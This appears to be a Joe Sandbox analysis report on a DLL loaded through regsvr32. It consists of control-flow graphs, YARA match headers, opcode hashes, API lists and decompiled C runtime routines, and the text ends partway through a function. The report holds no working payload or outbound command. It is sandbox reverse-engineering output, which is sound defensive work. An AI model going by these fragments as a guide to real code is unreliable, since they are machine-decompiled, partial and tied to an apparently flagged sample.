                                                                                                                                            control_flow_graph 458 18000e99c-18000e9ca 459 18000e9cc 458->459 460 18000e9ce-18000e9d4 459->460 461 18000e9da-18000e9e0 460->461 462 18000ee1d-18000f007 call 1800138d0 call 180028908 460->462 463 18000ee13-18000ee18 461->463 464 18000e9e6-18000e9ec 461->464 479 18000f009 462->479 480 18000f00e-18000f202 call 180028908 call 180017d54 462->480 463->460 466 18000e9f2-18000e9f8 464->466 467 18000ea99-18000eaa6 464->467 469 18000f20d-18000f213 466->469 470 18000e9fe-18000ea89 call 180028724 466->470 472 18000eaa8-18000eaae 467->472 473 18000eab0-18000ead3 467->473 469->460 474 18000f219-18000f226 469->474 470->474 482 18000ea8f-18000ea94 470->482 477 18000ead9-18000edf1 call 180001000 call 180028908 call 180017d54 472->477 473->477 491 18000edf6-18000edfe 477->491 479->480 480->459 492 18000f208 480->492 482->460 491->474 493 18000ee04-18000ee0e 491->493 492->469 493->460
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: &k8$,8$\$`/U
                                                                                                                                            • API String ID: 0-956392518
                                                                                                                                            • Opcode ID: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                                                                                                            • Instruction ID: eb6f1617cd975c6e10cf27e40abea16f203efbb492656816d2660eb5cb9ff966
                                                                                                                                            • Opcode Fuzzy Hash: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                                                                                                            • Instruction Fuzzy Hash: 7D2215715093C88BDBBECF64C889BDA7BB9FB44708F10561CEA4A9E258DB745748CB01
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FFC65CF33C2), ref: 00007FFC65CF8876
                                                                                                                                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC65CF33C2), ref: 00007FFC65CF8891
                                                                                                                                            • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC65CF33C2), ref: 00007FFC65CF88BB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$CreateInformationVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3563531100-0
                                                                                                                                            • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                                                                                            • Instruction ID: a2a420749bdd9011a3e3d30eb8ddc6980cd54cb7675c57b8ef62fc538f440485
                                                                                                                                            • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                                                                                            • Instruction Fuzzy Hash: 21F05475A0C66AC2F7249B51EA0577913A0BF49B45F604C34D54D826E4DE3E9589C620
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 500 180025a4c-180025a83 501 180025a85-180025a8a 500->501 502 180025f34-180025f39 call 180016da8 501->502 503 180025a90-180025a95 501->503 514 180025f3e-180025f43 502->514 504 180025a9b-180025aa0 503->504 505 180025e5e-180025f2f call 180029374 503->505 507 180025e35-180025e53 504->507 508 180025aa6-180025aab 504->508 505->501 507->505 511 180025ab1-180025ab6 508->511 512 180025cff-180025e1c call 180001000 508->512 518 180025abc-180025ac1 511->518 519 180025cf0-180025cfa 511->519 520 180025e21-180025e30 512->520 515 180025f49 514->515 516 180026060-18002606d 514->516 515->501 521 180025c24-180025ceb call 18001958c 518->521 522 180025ac7-180025acc 518->522 519->501 520->501 521->501 524 180025ad2-180025ad7 522->524 525 180025f4e-18002605a call 180028724 call 18001c064 522->525 524->514 528 180025add-180025bf1 call 180020048 524->528 525->516 532 180025bf6-180025bfc 528->532 534 180025c1a-180025c1f 532->534 535 180025bfe-180025c15 532->535 534->501 535->501
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6"*n$US8$z:7
                                                                                                                                            • API String ID: 0-1851205513
                                                                                                                                            • Opcode ID: 58433aa2b9792d0adc8ab8c110bebc0308ab9451cbeb18f254fd2c2554077b90
                                                                                                                                            • Instruction ID: 607295142d9547307d046de48b3748fa472aee76cf77032a28cf9f5936a2d7e5
                                                                                                                                            • Opcode Fuzzy Hash: 58433aa2b9792d0adc8ab8c110bebc0308ab9451cbeb18f254fd2c2554077b90
                                                                                                                                            • Instruction Fuzzy Hash: 57E1F9706057889FEBBADF24C88A7DE7BA1FB49744F50422DDC8A8E250DB745648CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 536 180020118-180020142 537 180020147-18002014c 536->537 538 180020152-180020157 537->538 539 180020380-1800203f5 call 1800075b8 537->539 540 180020358-180020366 538->540 541 18002015d-180020162 538->541 552 180020401 539->552 553 1800203f7-1800203fc 539->553 543 18002036c-180020370 540->543 544 180020412-180020484 call 18001958c 541->544 545 180020168-18002016d 541->545 550 180020372-18002037b 543->550 551 180020368-180020369 543->551 555 180020489-180020495 544->555 548 180020173-180020178 545->548 549 18002034e-180020353 545->549 556 1800202c8-180020349 call 18001958c 548->556 557 18002017e-180020183 548->557 549->537 550->537 551->543 554 180020406-18002040b 552->554 553->537 554->555 558 18002040d 554->558 556->537 560 180020189-18002018e 557->560 561 18002021d-1800202ad call 180020048 557->561 558->537 560->554 564 180020194-180020218 call 1800011f4 560->564 565 1800202b2-1800202b8 561->565 564->537 565->555 567 1800202be-1800202c3 565->567 567->537
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: -;$-;$00
                                                                                                                                            • API String ID: 0-2539125404
                                                                                                                                            • Opcode ID: e5d2d7a5effa9139195d6567bf27e5ccee4a567d383a55797e692f753d0c9eb9
                                                                                                                                            • Instruction ID: 193f60ccd2842279d11af0df6a42cb9b90b2b7ab7c379db6368ea7840d008f1f
                                                                                                                                            • Opcode Fuzzy Hash: e5d2d7a5effa9139195d6567bf27e5ccee4a567d383a55797e692f753d0c9eb9
                                                                                                                                            • Instruction Fuzzy Hash: 28A1377051478CDBDBAADF28C8C9AD93BA1FF48394FA05219FD0287251CB75D985CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: f+hb$zm
                                                                                                                                            • API String ID: 0-4294548274
                                                                                                                                            • Opcode ID: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                                                                                                            • Instruction ID: b2f4f577a3df5b024e80de80ecfd692f42b94ed80d4232126a84951cd6e5a716
                                                                                                                                            • Opcode Fuzzy Hash: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                                                                                                            • Instruction Fuzzy Hash: 4852C97050068D8FDF98DF68C8866DA3BA1FB58388F124319FC8AA7291D778D655CBC4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: L$u.
                                                                                                                                            • API String ID: 0-1908859981
                                                                                                                                            • Opcode ID: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                                                                                                            • Instruction ID: fe013bb6a98280fd3664de29af0d6deafe853b8c6d857857911529a75c261ac8
                                                                                                                                            • Opcode Fuzzy Hash: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                                                                                                            • Instruction Fuzzy Hash: FDE1167152478DABDF98CF28C8C6ADD3BA1FB48394F906229FD0287260D775D985CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #U6
                                                                                                                                            • API String ID: 0-3443268899
                                                                                                                                            • Opcode ID: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                                                                                                            • Instruction ID: 59d24509ec93e958c93c94dd97d6e32fc772fd919bc53da4f0cdd3954875abf9
                                                                                                                                            • Opcode Fuzzy Hash: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                                                                                                            • Instruction Fuzzy Hash: 57510E715087888BC7B8DF28C49A6CBBBF1FF86344F10091DE68987260CB76D949CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: {dN
                                                                                                                                            • API String ID: 0-923835543
                                                                                                                                            • Opcode ID: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                                                                                                            • Instruction ID: f9e1d774cd1a5aafce577d99eb21246fb33c51757267e19de4f8e3655d4c3e4d
                                                                                                                                            • Opcode Fuzzy Hash: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                                                                                                            • Instruction Fuzzy Hash: A24118B091470D8BCF48DFA8C58A1DEBFB1FB483A8F25521DE90AB6250C7749585CF88
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                                                                                                            • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                                                                                                            • API String ID: 1648969265-681193798
                                                                                                                                            • Opcode ID: f93d43cf3bb1813beee52146895ee3ce0099543f481cf7d004c716eae911393f
                                                                                                                                            • Instruction ID: fb5fef840986f1bd02aa23727d62758773491ea04e211c470bfa1addbe901f8e
                                                                                                                                            • Opcode Fuzzy Hash: f93d43cf3bb1813beee52146895ee3ce0099543f481cf7d004c716eae911393f
                                                                                                                                            • Instruction Fuzzy Hash: 1E514F22A1DA5AD6E754CF14E48072A77A0FB89F44F600936FA8E477A4CF7ED441CB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00007FFC65CF7540: _initp_misc_winsig.LIBCMTD ref: 00007FFC65CF757B
                                                                                                                                              • Part of subcall function 00007FFC65CF7540: _initp_eh_hooks.LIBCMTD ref: 00007FFC65CF7585
                                                                                                                                              • Part of subcall function 00007FFC65CF8FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFC65CF906F
                                                                                                                                            • FlsAlloc.KERNEL32 ref: 00007FFC65CF3D55
                                                                                                                                              • Part of subcall function 00007FFC65CF3E00: FlsFree.KERNEL32 ref: 00007FFC65CF3E13
                                                                                                                                              • Part of subcall function 00007FFC65CF3E00: _mtdeletelocks.LIBCMTD ref: 00007FFC65CF3E23
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                                                                                                                            • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                                                                                                                            • API String ID: 3828364660-3898981997
                                                                                                                                            • Opcode ID: 57cc27a1817b354a41c90cd4e830bede4952610ad4d5e9ce9ee4939fd8329ad8
                                                                                                                                            • Instruction ID: 4cbe8cafad0471ffb3c99bb9d56d47d2a6ef792ebfaa07a122939c7c66ab2f90
                                                                                                                                            • Opcode Fuzzy Hash: 57cc27a1817b354a41c90cd4e830bede4952610ad4d5e9ce9ee4939fd8329ad8
                                                                                                                                            • Instruction Fuzzy Hash: 4E116062A2C52AF5F360AF21E9453792651AF48F50F200A30E55E423D5DF2EE440C631
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            C-Code - Quality: 16%
                                                                                                                                            			E00007FFC7FFC65CFF570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
                                                                                                                                            				long long _v24;
                                                                                                                                            				intOrPtr _v32;
                                                                                                                                            				long long _v40;
                                                                                                                                            				signed int _v48;
                                                                                                                                            				int _v52;
                                                                                                                                            				int _v56;
                                                                                                                                            				signed int _v64;
                                                                                                                                            				long long _v72;
                                                                                                                                            				void* _t53;
                                                                                                                                            				long long _t82;
                                                                                                                                            
                                                                                                                                            				_a32 = r9d;
                                                                                                                                            				_a24 = __r8;
                                                                                                                                            				_a16 = __edx;
                                                                                                                                            				_a8 = __rcx;
                                                                                                                                            				_v56 = 0;
                                                                                                                                            				if (_a48 != 0) goto 0x65cff5ab;
                                                                                                                                            				_a48 =  *((intOrPtr*)( *_a8 + 4));
                                                                                                                                            				if (_a64 == 0) goto 0x65cff5bf;
                                                                                                                                            				_v32 = 9;
                                                                                                                                            				goto 0x65cff5c7;
                                                                                                                                            				_v32 = 1;
                                                                                                                                            				_v64 = 0;
                                                                                                                                            				_v72 = 0;
                                                                                                                                            				r9d = _a32;
                                                                                                                                            				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                                                                                            				if (_v48 != 0) goto 0x65cff60b;
                                                                                                                                            				goto 0x65cff6f8;
                                                                                                                                            				if (0 != 0) goto 0x65cff652;
                                                                                                                                            				if (_v48 <= 0) goto 0x65cff652;
                                                                                                                                            				if (_v48 - 0xfffffff0 > 0) goto 0x65cff652;
                                                                                                                                            				_t82 = _v48 + _v48 + 0x10;
                                                                                                                                            				_t53 = malloc(??); // executed
                                                                                                                                            				E00007FFC7FFC65CFF3B0(_t53, 0xdddd, _t82);
                                                                                                                                            				_v24 = _t82;
                                                                                                                                            				goto 0x65cff65b;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				_v40 = _v24;
                                                                                                                                            				if (_v40 != 0) goto 0x65cff674;
                                                                                                                                            				goto 0x65cff6f8;
                                                                                                                                            				E00007FFC7FFC65CF32B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
                                                                                                                                            				_v64 = _v48;
                                                                                                                                            				_v72 = _v40;
                                                                                                                                            				r9d = _a32;
                                                                                                                                            				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                                                                                            				if (_v52 == 0) goto 0x65cff6ea;
                                                                                                                                            				r8d = _v52;
                                                                                                                                            				_v56 = GetStringTypeW(??, ??, ??, ??);
                                                                                                                                            				E00007FFC7FFC65CFF3E0(_v40);
                                                                                                                                            				return _v56;
                                                                                                                                            			}













                                                                                                                                            0x7ffc65cff570
                                                                                                                                            0x7ffc65cff575
                                                                                                                                            0x7ffc65cff57a
                                                                                                                                            0x7ffc65cff57e
                                                                                                                                            0x7ffc65cff587
                                                                                                                                            0x7ffc65cff597
                                                                                                                                            0x7ffc65cff5a4
                                                                                                                                            0x7ffc65cff5b3
                                                                                                                                            0x7ffc65cff5b5
                                                                                                                                            0x7ffc65cff5bd
                                                                                                                                            0x7ffc65cff5bf
                                                                                                                                            0x7ffc65cff5c7
                                                                                                                                            0x7ffc65cff5cf
                                                                                                                                            0x7ffc65cff5d8
                                                                                                                                            0x7ffc65cff5f9
                                                                                                                                            0x7ffc65cff602
                                                                                                                                            0x7ffc65cff606
                                                                                                                                            0x7ffc65cff60f
                                                                                                                                            0x7ffc65cff616
                                                                                                                                            0x7ffc65cff62a
                                                                                                                                            0x7ffc65cff631
                                                                                                                                            0x7ffc65cff639
                                                                                                                                            0x7ffc65cff646
                                                                                                                                            0x7ffc65cff64b
                                                                                                                                            0x7ffc65cff650
                                                                                                                                            0x7ffc65cff652
                                                                                                                                            0x7ffc65cff660
                                                                                                                                            0x7ffc65cff66b
                                                                                                                                            0x7ffc65cff66f
                                                                                                                                            0x7ffc65cff686
                                                                                                                                            0x7ffc65cff68f
                                                                                                                                            0x7ffc65cff698
                                                                                                                                            0x7ffc65cff69d
                                                                                                                                            0x7ffc65cff6bf
                                                                                                                                            0x7ffc65cff6c8
                                                                                                                                            0x7ffc65cff6d2
                                                                                                                                            0x7ffc65cff6e6
                                                                                                                                            0x7ffc65cff6ef
                                                                                                                                            0x7ffc65cff6fc

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2618398691-0
                                                                                                                                            • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                                                                                            • Instruction ID: ca49bde2ee19b70e7e7e071fffc9538d4a4121d857dbd498d736ed4a55e6d048
                                                                                                                                            • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                                                                                            • Instruction Fuzzy Hash: 3D41273261C795CAE7608F15E48436AB7A0FB89B94F204535EA9E43BA8DF7DD484CF10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName__initmbctable
                                                                                                                                            • String ID: C:\Windows\system32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                                                                                                                            • API String ID: 3548084100-462439500
                                                                                                                                            • Opcode ID: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                                                                                            • Instruction ID: 3c1f197b0e51c754e5103ffb6173d31b7ede7eca3435084c3664fded673746f5
                                                                                                                                            • Opcode Fuzzy Hash: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                                                                                            • Instruction Fuzzy Hash: 0641302261DA5AD1EA60CB15E88076A7760FF89B65F600B36E6AE42BF4CF3DD144C710
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            C-Code - Quality: 23%
                                                                                                                                            			E00007FFC7FFC65CFA5E0(long long __rcx, void* _a8) {
                                                                                                                                            				signed int _v24;
                                                                                                                                            				char _v42;
                                                                                                                                            				void* _v48;
                                                                                                                                            				signed int _v56;
                                                                                                                                            				char _v312;
                                                                                                                                            				signed char* _v328;
                                                                                                                                            				char _v584;
                                                                                                                                            				char _v840;
                                                                                                                                            				char _v1352;
                                                                                                                                            				char _v1384;
                                                                                                                                            				char _v1392;
                                                                                                                                            				intOrPtr _v1400;
                                                                                                                                            				long long _v1408;
                                                                                                                                            				long long _v1416;
                                                                                                                                            				signed long long _t206;
                                                                                                                                            				signed char* _t214;
                                                                                                                                            				signed long long _t223;
                                                                                                                                            				intOrPtr _t225;
                                                                                                                                            				intOrPtr _t226;
                                                                                                                                            				signed long long _t233;
                                                                                                                                            
                                                                                                                                            				_t224 = __rcx;
                                                                                                                                            				_a8 = __rcx;
                                                                                                                                            				_t206 =  *0x65d1b018; // 0x6e969b7d650c
                                                                                                                                            				_v24 = _t206 ^ _t233;
                                                                                                                                            				if (GetCPInfo(??, ??) == 0) goto 0x65cfa906;
                                                                                                                                            				_v56 = 0;
                                                                                                                                            				goto 0x65cfa63c;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				if (_v56 - 0x100 >= 0) goto 0x65cfa661;
                                                                                                                                            				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
                                                                                                                                            				goto 0x65cfa62c;
                                                                                                                                            				_v312 = 0x20;
                                                                                                                                            				_v328 =  &_v42;
                                                                                                                                            				goto 0x65cfa68f;
                                                                                                                                            				_v328 =  &(_v328[2]);
                                                                                                                                            				if (( *_v328 & 0x000000ff) == 0) goto 0x65cfa6ea;
                                                                                                                                            				_v56 =  *_v328 & 0x000000ff;
                                                                                                                                            				goto 0x65cfa6c2;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				_t214 = _v328;
                                                                                                                                            				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0x65cfa6e8;
                                                                                                                                            				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
                                                                                                                                            				goto 0x65cfa6b2;
                                                                                                                                            				goto 0x65cfa67b;
                                                                                                                                            				_v1392 = 0;
                                                                                                                                            				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
                                                                                                                                            				_v1408 =  *((intOrPtr*)(_a8 + 4));
                                                                                                                                            				_v1416 =  &_v1352;
                                                                                                                                            				r9d = 0x100;
                                                                                                                                            				E00007FFC7FFC65CFF4D0(1,  &_v1352, __rcx,  &_v312); // executed
                                                                                                                                            				_v1384 = 0;
                                                                                                                                            				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                                                                                                            				_v1400 = 0x100;
                                                                                                                                            				_v1408 =  &_v840;
                                                                                                                                            				_v1416 = 0x100;
                                                                                                                                            				r8d = 0x100;
                                                                                                                                            				E00007FFC7FFC65CFEF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
                                                                                                                                            				_v1384 = 0;
                                                                                                                                            				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                                                                                                            				_v1400 = 0x100;
                                                                                                                                            				_v1408 =  &_v584;
                                                                                                                                            				_v1416 = 0x100;
                                                                                                                                            				r8d = 0x200;
                                                                                                                                            				_t223 = _a8;
                                                                                                                                            				E00007FFC7FFC65CFEF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
                                                                                                                                            				_v56 = 0;
                                                                                                                                            				_v56 = _v56 + 1;
                                                                                                                                            				if (_v56 - 0x100 >= 0) goto 0x65cfa901;
                                                                                                                                            				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0x65cfa879;
                                                                                                                                            				_t225 = _a8;
                                                                                                                                            				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
                                                                                                                                            				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
                                                                                                                                            				goto 0x65cfa8fc;
                                                                                                                                            				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0x65cfa8e5;
                                                                                                                                            				_t226 = _a8;
                                                                                                                                            				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
